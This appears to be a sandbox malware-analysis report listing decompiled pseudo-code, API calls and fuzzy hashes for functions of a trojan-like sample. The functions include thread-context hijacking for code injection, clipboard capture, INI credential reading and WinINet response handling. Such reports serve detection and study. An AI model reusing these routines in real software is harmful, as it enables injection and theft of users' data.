        									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
        									__eflags = _t77;
        									if(_t77 != 0) {
        										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
        										__eflags = _t80;
        										if(_t80 != 0) {
        											_t82 = E004185A6(_v624, _t93);
        											__eflags = _t82;
        											if(_t82 > 0) {
        												_t113 =  &_v564;
        												_t83 = 0x55;
        												E004128DB(_t83,  &_v564);
        												_push(_t102);
        												_push(_v620);
        												_push(_t93);
        												_push(_v616);
        												_t37 =  &(_t93[0xff]); // 0x1fe
        												_t103 = _t37;
        												_t86 = E0040CEB5(_t113, 0x311, _t37, _t113);
        												_t117 = _t117 + 0x14;
        												__eflags = _t86;
        												if(_t86 > 0) {
        													_t114 = _a4;
        													_t87 = E0040C5B6(_t86, _t114, _t103);
        													__eflags = _t87;
        													if(_t87 != 0) {
        														_t39 = _t114 + 4;
        														 *_t39 =  &(( *(_t114 + 4))[0]);
        														__eflags =  *_t39;
        													}
        												}
        											}
        										}
        									}
        								}
        							}
        							_t69 = E0040D0AE(_v624, 1);
        							_v628 = _t69;
        							__eflags = _t69;
        						} while (_t69 != 0);
        						E0040C1C2(_v620);
        						_t107 = _v616;
        					}
        					goto L18;
        				} else {
        					E00418659(_t120,  &_v524, _a4);
        					goto L19;
        				}
        			}

        APIs
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • GetPrivateProfileStringW.KERNEL32 ref: 0041871A
        • GetPrivateProfileStringW.KERNEL32 ref: 004187AE
        • GetPrivateProfileIntW.KERNEL32 ref: 004187CC
        • GetPrivateProfileStringW.KERNEL32 ref: 004187F7
        • GetPrivateProfileStringW.KERNEL32 ref: 00418813
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfile$String$CombinePath
        • String ID:
        • API String ID: 2134968610-0
        • Opcode ID: 94f40f8618690de0add3e4b5c76fd643e087b0d27408a829447f9a2fc798835f
        • Instruction ID: 8f5face52e785cb9bb826bf73ab75f92cb845b6964bcda7d605ac633ab714712
        • Opcode Fuzzy Hash: 94f40f8618690de0add3e4b5c76fd643e087b0d27408a829447f9a2fc798835f
        • Instruction Fuzzy Hash: E051C432904305ABD710EB61CC41FEB7BE8EF84744F10093EBA84E71A1DB78D9458B9A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E0041202B(void* __ecx, signed int __edx, void** __esi, long _a4) {
        				char _v5;
        				void _v16;
        				struct _OVERLAPPED* _v24;
        				struct _OVERLAPPED* _v28;
        				signed int _v32;
        				signed int _v36;
        				void* _t29;
        				signed int _t31;
        				int _t38;
        				int _t39;
        				signed int _t41;
        				int _t42;
        				int _t45;
        				intOrPtr _t48;
        				void* _t49;
        				signed int _t53;
        				struct _OVERLAPPED* _t54;
        				void** _t56;
        
        				_t56 = __esi;
        				_t53 = __edx;
        				_t49 = __ecx;
        				_t54 = 0;
        				_v5 = 0;
        				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
        				 *__esi = _t29;
        				if(_t29 != 0xffffffff) {
        					_t31 = E004114F6(_t49, _t29);
        					_v36 = _t31;
        					_v32 = _t53;
        					if((_t31 & _t53) == 0xffffffff) {
        						L4:
        						CloseHandle( *_t56);
        						 *_t56 =  *_t56 | 0xffffffff;
        					} else {
        						if((_t31 | _t53) == 0) {
        							L18:
        							_t56[2] = _t56[2] | 0xffffffff;
        							_t25 =  &(_t56[3]);
        							 *_t25 = _t56[3] | 0xffffffff;
        							__eflags =  *_t25;
        							_v5 = 1;
        							E004114A6( *_t56, _t54, _t54, _t54);
        						} else {
        							_v28 = 0;
        							_v24 = 0;
        							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
        								while(1) {
        									__eflags = _a4 - _t54;
        									if(_a4 == _t54) {
        										goto L18;
        									}
        									__eflags = _a4 - 5;
        									if(_a4 != 5) {
        										L16:
        										_t38 = E004114A6( *_t56, _v28, _v24, _t54);
        										__eflags = _t38;
        										if(_t38 == 0) {
        											goto L4;
        										} else {
        											_t39 = SetEndOfFile( *_t56);
        											__eflags = _t39;
        											if(_t39 == 0) {
        												goto L4;
        											} else {
        												goto L18;
        											}
        										}
        									} else {
        										_t41 = _v16 ^ _t56[4];
        										asm("adc edi, [ebp-0x14]");
        										_t48 = _t41 + _v28 + 5;
        										asm("adc edi, ecx");
        										_v16 = _t41;
        										__eflags = 0 - _v32;
        										if(__eflags > 0) {
        											L15:
        											_t54 = 0;
        											__eflags = 0;
        											goto L16;
        										} else {
        											if(__eflags < 0) {
        												L11:
        												__eflags = _t41 - 0xa00000;
        												if(_t41 > 0xa00000) {
        													goto L15;
        												} else {
        													_t42 = E004114A6( *_t56, _t41, 0, 1);
        													__eflags = _t42;
        													if(_t42 == 0) {
        														goto L4;
        													} else {
        														_v28 = _t48;
        														_v24 = 0;
        														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
        														__eflags = _t45;
        														if(_t45 != 0) {
        															_t54 = 0;
        															__eflags = 0;
        															continue;
        														} else {
        															goto L4;
        														}
        													}
        												}
        											} else {
        												__eflags = _t48 - _v36;
        												if(_t48 > _v36) {
        													goto L15;
        												} else {
        													goto L11;
        												}
        											}
        										}
        									}
        									goto L19;
        								}
        								goto L18;
        							} else {
        								goto L4;
        							}
        						}
        					}
        				}
        				L19:
        				return _v5;
        			}






















        APIs
        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0041204C
          • Part of subcall function 004114F6: GetFileSizeEx.KERNEL32(c A,c A,?,?,?,00412063,00000000), ref: 00411502
        • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0041208D
        • CloseHandle.KERNEL32(?,00000000), ref: 00412099
        • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00412108
        • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041212E
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Read$CloseCreateHandleSize
        • String ID:
        • API String ID: 1850650832-0
        • Opcode ID: 77950c4bc29ec8f84c2973dfb2ac86323fda6b6cc1a1236fca3ab5bec0d0ee6e
        • Instruction ID: 911bdecabc8eb4d655840cbd287b731f2f3cec379d60fa67e3a49ff590caebe3
        • Opcode Fuzzy Hash: 77950c4bc29ec8f84c2973dfb2ac86323fda6b6cc1a1236fca3ab5bec0d0ee6e
        • Instruction Fuzzy Hash: 6F41C371800205AEDF248F65CD45FEFBFB5EF88710F10422AE695E22A0D3754591CB69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 84%
        			E00412760(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
        				int _v8;
        				void* _t37;
        				long _t38;
        				struct HBITMAP__* _t46;
        				void* _t47;
        				signed int _t56;
        				signed int _t57;
        				BITMAPINFO** _t62;
        				BITMAPINFO* _t64;
        
        				_t57 = __edx;
        				_v8 = 0;
        				_t64 = E0040C192(0x428);
        				if(_t64 == 0) {
        					L14:
        					if(_a24 != 0) {
        						DeleteObject(_a24);
        					}
        					L16:
        					return _v8;
        				}
        				_t64->bmiHeader = 0x28;
        				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
        					L13:
        					E0040C1C2(_t64);
        					goto L14;
        				} else {
        					DeleteObject(_a24);
        					asm("cdq");
        					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
        					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
        					_a24 = 0;
        					_t64->bmiHeader.biHeight = _t56;
        					if(_t37 == 0) {
        						L7:
        						_t64->bmiHeader.biClrUsed = 0;
        						_push(8);
        						_t64->bmiHeader.biClrImportant = 0;
        						L8:
        						_pop(_t38);
        						_t64->bmiHeader.biBitCount = _t38;
        						L9:
        						_t62 = _a8;
        						asm("cdq");
        						_t58 = _t57 & 0x00000007;
        						asm("cdq");
        						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
        						_t64->bmiHeader.biCompression = 0;
        						if(_t62 != 0) {
        							 *_t62 = _t64;
        						}
        						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
        						_v8 = _t46;
        						if(_t46 == 0 || _t62 == 0) {
        							goto L13;
        						} else {
        							goto L16;
        						}
        					}
        					_t47 = _t37 - 3;
        					if(_t47 == 0) {
        						goto L7;
        					}
        					if(_t47 != 0x14) {
        						goto L9;
        					}
        					_push(0x20);
        					goto L8;
        				}
        			}













        APIs
        • GetDIBits.GDI32(00000000,004168B2,00000000,00000001,00000000,00000000,00000000), ref: 00412798
        • GetDIBits.GDI32(00000000,004168B2,00000000,00000001,00000000,00000000,00000000), ref: 004127AE
        • DeleteObject.GDI32(004168B2), ref: 004127BB
        • CreateDIBSection.GDI32(00000000,00000000,00000000,00423EA0,?,?), ref: 0041282B
        • DeleteObject.GDI32(004168B2), ref: 0041284A
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: BitsDeleteObject$CreateSection
        • String ID:
        • API String ID: 1423349713-0
        • Opcode ID: d75f62a9b9486437bb53397700a31354b04aa2d311a0183dd9bca4e8e88a4d72
        • Instruction ID: 8ee4fb1876aa67620ec481b9724aa78964df894d07c8f89635a2307c3a323366
        • Opcode Fuzzy Hash: d75f62a9b9486437bb53397700a31354b04aa2d311a0183dd9bca4e8e88a4d72
        • Instruction Fuzzy Hash: DE31B37210020AAFDF209F25CE849AB7BE9EF08344B04853FF555D66A0C379DDA1DB64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E0041C949(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
        				intOrPtr _v28;
        				signed int _v44;
        				char _v52;
        				intOrPtr _v56;
        				char _v61;
        				intOrPtr _v64;
        				signed int _v72;
        				intOrPtr _v76;
        				char _v77;
        				intOrPtr _v84;
        				intOrPtr _v85;
        				char _v89;
        				void* __esi;
        				char _t31;
        				intOrPtr _t32;
        				char* _t37;
        				intOrPtr _t44;
        				intOrPtr* _t58;
        				intOrPtr _t62;
        				intOrPtr* _t63;
        				intOrPtr _t65;
        
        				_t63 = __edi;
        				ResetEvent(_a8);
        				_t31 = E0040C192(0x1000);
        				_t65 = 0;
        				_v52 = _t31;
        				if(_t31 != 0) {
        					_t58 = __imp__InternetSetStatusCallbackW;
        					_t32 =  *_t58(_a4, E0041C900);
        					_t62 = 0x28;
        					_v56 = _t32;
        					 *_a12 = 0;
        					 *__edi = 0;
        					_v61 = 1;
        					E0040C275( &_v52,  &_v52, 0, _t62);
        					_v64 = _t62;
        					_v44 = _v72;
        					while(1) {
        						L3:
        						_t37 =  &_v52;
        						_v28 = 0x1000;
        						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
        						if(_t37 == 0) {
        							break;
        						}
        						if(_v44 != _t65) {
        							_t67 = _a12;
        							if(E0040C14D( *_t63 + _v44, _a12) == 0) {
        								L9:
        								_v77 = 0;
        							} else {
        								E0040C1FE( *_t67 +  *_t63, _v76, _v44);
        								 *_t63 =  *_t63 + _v56;
        								_t65 = 0;
        								continue;
        							}
        						}
        						L10:
        						asm("sbb eax, eax");
        						 *_t58(_a4,  ~(_v72 + 1) & _v72);
        						E0040C1C2(_v84);
        						if(_v89 == 0) {
        							E0040C1C2( *_a12);
        						}
        						_t44 = _v85;
        						goto L13;
        					}
        					if(GetLastError() != 0x3e5) {
        						goto L9;
        					} else {
        						E0040F92F( &_a8);
        						goto L3;
        					}
        					goto L10;
        				} else {
        					E0040C1C2(0);
        					_t44 = 0;
        				}
        				L13:
        				return _t44;
        			}

























        APIs
        • ResetEvent.KERNEL32(?), ref: 0041C957
        • InternetSetStatusCallbackW.WININET(?,0041C900), ref: 0041C98C
        • InternetReadFileExA.WININET ref: 0041C9CC
        • GetLastError.KERNEL32 ref: 0041C9D6
        • InternetSetStatusCallbackW.WININET(?,?), ref: 0041CA3A
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
        • String ID:
        • API String ID: 4044253124-0
        • Opcode ID: c0198c1f3005f2c3877436ae2891c5ff60d4313e6355d768b0aafe461902cd30
        • Instruction ID: b544d496662d9d5908eca4773c12999c6d91e6d0025643c13c60dab549566d69
        • Opcode Fuzzy Hash: c0198c1f3005f2c3877436ae2891c5ff60d4313e6355d768b0aafe461902cd30
        • Instruction Fuzzy Hash: D3317A71154345EFCB11DFA5CCC1A9ABBE8FF48348F00492AF8849B2A1D738C954CB9A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E0041450A(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
        				struct _CONTEXT _v720;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t32;
        				void* _t36;
        				void* _t37;
        				void** _t45;
        				void* _t46;
        				void* _t47;
        				void** _t50;
        				void* _t52;
        				void* _t53;
        				signed int _t55;
        
        				_t47 = __edx;
        				_t45 = _a4;
        				_t32 =  *0x4238c4(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
        				_a40 = _t32;
        				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E004132A1() != 0 && GetProcessId( *_t45) != 0) {
        					_t36 = E004130C4(_t46, _t47, _t35);
        					_a44 = _t36;
        					_t63 = _t36;
        					if(_t36 != 0) {
        						_push(_t52);
        						_t37 = E004131B6(_t46,  *_t45, _t52, _t63, _t36, 0);
        						_t50 = _a8;
        						_t53 = _t37;
        						_a32 = _t53;
        						_t55 = _t53 -  *0x4238b4 + E00413934;
        						_v720.ContextFlags = 0x10003;
        						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x4238cc) {
        							L12:
        							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
        						} else {
        							if(( *0x4238a0 & 0x00000010) != 0) {
        								_t55 = _t55 ^ _v720.Eax;
        							}
        							_v720.Eax = _t55;
        							_v720.ContextFlags = 0x10002;
        							if(SetThreadContext( *_t50,  &_v720) == 0) {
        								goto L12;
        							}
        						}
        						CloseHandle(_a44);
        					}
        				}
        				return _a40;
        			}

















        APIs
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9
        • GetProcessId.KERNEL32(?), ref: 00414572
          • Part of subcall function 004130C4: CreateMutexW.KERNEL32(004238D8,00000001,?,00423B18,0001FEE6,?,00000002,?,0001FEE6), ref: 00413115
          • Part of subcall function 004130C4: GetLastError.KERNEL32 ref: 00413121
          • Part of subcall function 004130C4: CloseHandle.KERNEL32(00000000), ref: 0041312F
        • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004145C4
        • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00414604
        • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 0041461A
        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00414623
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseContextHandleThread$CreateErrorFreeLastMutexObjectProcessSingleVirtualWait
        • String ID:
        • API String ID: 3998962940-0
        • Opcode ID: 9c68ff0d24089496ab817a76f47258a243e237c3731683d93551cbaeae0f5ed1
        • Instruction ID: 0e4b82f8d0a33d0294755a6130f5df4dcdb9f967057effe64250ffff9639e74d
        • Opcode Fuzzy Hash: 9c68ff0d24089496ab817a76f47258a243e237c3731683d93551cbaeae0f5ed1
        • Instruction Fuzzy Hash: 01318C31500219ABDF11AF64CD08FDA7BB9FF08709F0440A6FE08A6260C779D991CF58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040ADE8(struct HWND__* __ecx, intOrPtr* __edx) {
        				struct tagRECT _v24;
        				char _v28;
        				struct HWND__* _v32;
        				intOrPtr _v36;
        				struct HWND__* _v40;
        				void* __edi;
        				intOrPtr _t29;
        				signed int _t30;
        				RECT* _t52;
        				signed int _t54;
        				intOrPtr* _t61;
        
        				_t55 = __edx;
        				_t61 = __edx;
        				 *( *(__edx + 0x14)) = 0x3c;
        				_v32 = __ecx;
        				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
        					L12:
        					return 1;
        				}
        				_t29 =  *((intOrPtr*)(_t61 + 0x14));
        				_t54 =  *(_t29 + 0x24);
        				if((_t54 & 0x40000000) == 0) {
        					_t52 =  *_t61 + 0x24;
        				} else {
        					_t52 = _t61 + 4;
        				}
        				if((_t54 & 0x10000000) == 0) {
        					_t30 = 0;
        					goto L9;
        				} else {
        					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
        						L10:
        						E0040AC77( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
        						_v36 =  *_t61;
        						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
        						if(GetTopWindow(_v40) != 0) {
        							E004108C8( &_v28, _t35);
        						}
        						goto L12;
        					}
        					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
        						goto L12;
        					}
        					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
        					L9:
        					if(_t30 == 0) {
        						goto L12;
        					}
        					goto L10;
        				}
        			}















        APIs
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Rect$IntersectWindow$EmptyInfo
        • String ID:
        • API String ID: 1664082778-0
        • Opcode ID: 479e3d6dae9206087f9911a4863658b4be21d5f2b5b3a6925f5a7f13de804247
        • Instruction ID: 4dd2ee3d8118df447a4926d4b53b643ec2fc8d8e126e15e9dbae9defc1c05329
        • Opcode Fuzzy Hash: 479e3d6dae9206087f9911a4863658b4be21d5f2b5b3a6925f5a7f13de804247
        • Instruction Fuzzy Hash: 542183715443019BD720DF28EE85E97B7ECAF44714B04092AF892E7761D738E819CBB6
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041A9B2(void* __ecx, void* __eflags) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				char _v104;
        				char _v204;
        				char _v724;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t18;
        				void* _t24;
        				void* _t26;
        				long _t28;
        				long _t35;
        				void* _t40;
        				WCHAR* _t43;
        				void* _t50;
        
        				_t50 = __eflags;
        				_t40 = __ecx;
        				SetThreadPriority(GetCurrentThread(), 0);
        				_t18 = E0041317B(_t40, _t50, 0x19367402, 1);
        				_v12 = _t18;
        				if(_t18 != 0) {
        					E00413140(0xff220829,  &_v204, 0);
        					_t43 =  &_v724;
        					E0041349C(_t40, _t43, 1);
        					PathQuoteSpacesW(_t43);
        					_t41 = _t43;
        					_v8 = E0040CD11(_t43);
        					_t24 = E004132A1();
        					__eflags = _t24;
        					if(_t24 == 0) {
        						L7:
        						E0040F995(_v12);
        						__eflags = 0;
        						return 0;
        					}
        					_t26 = 3;
        					E004128DB(_t26,  &_v104);
        					_t28 = WaitForSingleObject( *0x423d64, 0xc8);
        					__eflags = _t28 - 0x102;
        					if(_t28 != 0x102) {
        						L6:
        						goto L7;
        					}
        					_v8 = _v8 + _v8 + 2;
        					do {
        						E00410441(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
        						_t35 = WaitForSingleObject( *0x423d64, 0xc8);
        						__eflags = _t35 - 0x102;
        					} while (_t35 == 0x102);
        					goto L6;
        				}
        				return _t18 + 1;
        			}



















        APIs
        • GetCurrentThread.KERNEL32 ref: 0041A9BD
        • SetThreadPriority.KERNEL32(00000000), ref: 0041A9C4
          • Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C
        • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0041AA07
        • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 0041AA3F
        • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 0041AA75
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
        • String ID:
        • API String ID: 123286213-0
        • Opcode ID: 8d151d7aee7d6fc0b4e7c610b12f7e693353b351f8aeeb36cfd81d40d644ee5f
        • Instruction ID: 16fd023486fd08417de226b061a41c1921ca9c66d7831f2343ec0d544423425e
        • Opcode Fuzzy Hash: 8d151d7aee7d6fc0b4e7c610b12f7e693353b351f8aeeb36cfd81d40d644ee5f
        • Instruction Fuzzy Hash: 5121CF71A00208BEDB11EBA0DD85FDE77B8EB04348F10006AF501F71A0DA789E85CB59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 63%
        			E0040A132(void* _a4) {
        				signed int _t11;
        				void* _t21;
        				void* _t23;
        				void* _t24;
        				int _t25;
        
        				_t25 = _a4;
        				_t23 = GetClipboardData(_t25);
        				_a4 = _t23;
        				if(E004132A1() == 0) {
        					return _t23;
        				}
        				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
        					L20:
        					return _a4;
        				} else {
        					_t21 = GlobalLock(_t23);
        					if(_t21 == 0) {
        						L19:
        						goto L20;
        					}
        					_t11 = _t25 - 1;
        					if(_t11 == 0) {
        						_push(_t21);
        						_push(0);
        						L12:
        						_t24 = E0040C402(_t11 | 0xffffffff);
        						L15:
        						if(_t24 != 0) {
        							EnterCriticalSection(0x422988);
        							E00409E2F(0x4017b4);
        							E00409E2F(_t24);
        							LeaveCriticalSection(0x422988);
        							if(_t24 != _t21) {
        								E0040C1C2(_t24);
        							}
        						}
        						GlobalUnlock(_a4);
        						goto L19;
        					}
        					_t11 = _t11 - 6;
        					if(_t11 == 0) {
        						_push(_t21);
        						_push(1);
        						goto L12;
        					}
        					if(_t11 != 6) {
        						_t24 = _a4;
        					} else {
        						_t24 = _t21;
        					}
        					goto L15;
        				}
        			}









        APIs
        • GetClipboardData.USER32 ref: 0040A13B
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9
        • GlobalLock.KERNEL32 ref: 0040A16F
        • EnterCriticalSection.KERNEL32(00422988,00000000,00000000), ref: 0040A1AF
        • LeaveCriticalSection.KERNEL32(00422988,00000000,004017B4), ref: 0040A1C6
        • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0040A1D9
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
        • String ID:
        • API String ID: 1109978993-0
        • Opcode ID: ecea2c1f5fcb2cd77fad4ca2d91b1b3bcb4cb1b2d2ec46cd6ae97df3b89ec140
        • Instruction ID: 39ea2de1660822f20c066d45d7d0ad368492d655e2c30e7702541b7ced387c13
        • Opcode Fuzzy Hash: ecea2c1f5fcb2cd77fad4ca2d91b1b3bcb4cb1b2d2ec46cd6ae97df3b89ec140
        • Instruction Fuzzy Hash: F41127326003056BC6112B289D849AF36299B853A0F18013BF815BF3E0DB7C8D51469F
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • #23.WS2_32(?,00000002,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040F6F9
        • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0040F723
        • #111.WS2_32 ref: 0040F72A
        • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040F756
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        • #3.WS2_32(?), ref: 0040F76A
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Ioctl$#111FreeHeap
        • String ID:
        • API String ID: 1077273850-0
        • Opcode ID: 1291b0fe42db3397460248890730b1a893bba9080fa6ed505c3b18366a6c3a38
        • Instruction ID: 112c2364d610c5f514a1bc7a0009d6aa755204f300ea960dfb3f6e1bdd216e64
        • Opcode Fuzzy Hash: 1291b0fe42db3397460248890730b1a893bba9080fa6ed505c3b18366a6c3a38
        • Instruction Fuzzy Hash: 76115EB1801128BFDB20AB65DD89CEF7E2CEF453A4F104235F405B61A0D7349E41DAA4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E0040A9EE(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
        				int _t20;
        				signed int _t21;
        				struct HWND__* _t28;
        				char* _t32;
        
        				_t28 = _a4;
        				if(( *0x4238a0 & 0x00000004) == 0 || E004132A1() == 0) {
        					L9:
        					return GetUpdateRect(_t28, _a8, _a12);
        				} else {
        					_t32 = TlsGetValue( *0x423e84);
        					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
        						goto L9;
        					} else {
        						if(_a8 != 0) {
        							_t6 = _t32 + 0xc; // 0xc
        							E0040C1FE( &_a8, _t6, 0x10);
        						}
        						if(_a12 != 0) {
        							_t20 = SaveDC( *(_t32 + 8));
        							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
        							asm("sbb eax, eax");
        							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
        							RestoreDC( *(_t32 + 8), _t20);
        						}
        						 *_t32 = 1;
        						return 1;
        					}
        				}
        			}








        APIs
        • GetUpdateRect.USER32 ref: 0040AA75
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9
        • TlsGetValue.KERNEL32 ref: 0040AA0E
        • SaveDC.GDI32(?), ref: 0040AA3E
        • SendMessageW.USER32(?,00000014,?,00000000), ref: 0040AA4E
        • RestoreDC.GDI32(?,00000000), ref: 0040AA60
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
        • String ID:
        • API String ID: 3142230470-0
        • Opcode ID: 8fab9b95da80baab7f9f06c0aa03e46981ba78558653aa70dceb5e34783af577
        • Instruction ID: dd28e4c5e9874d695e7c1081c3b79c7c16e617d8acf354410a58c8117f3bc64a
        • Opcode Fuzzy Hash: 8fab9b95da80baab7f9f06c0aa03e46981ba78558653aa70dceb5e34783af577
        • Instruction Fuzzy Hash: 12119A31200344ABCB319F70DE48FAB7BA8AB04315F04883AF996A25F1C3389550CF29
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E0040ABE3() {
        				struct tagMSG _v32;
        				signed int _t12;
        				char _t17;
        				void* _t21;
        
        				SetThreadPriority(GetCurrentThread(), 1);
        				SetEvent( *0x423e8c);
        				while(1) {
        					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
        					if(_t12 == 0xffffffff) {
        						break;
        					}
        					if(_t12 == 0) {
        						break;
        					}
        					if(_v32.message ==  *0x423e88 && _v32.wParam == 0xfffffffc) {
        						_t17 = E0040A496( *0x423e90 + 0x114, _t19, _t21, 0x423e80, _v32.lParam, 1);
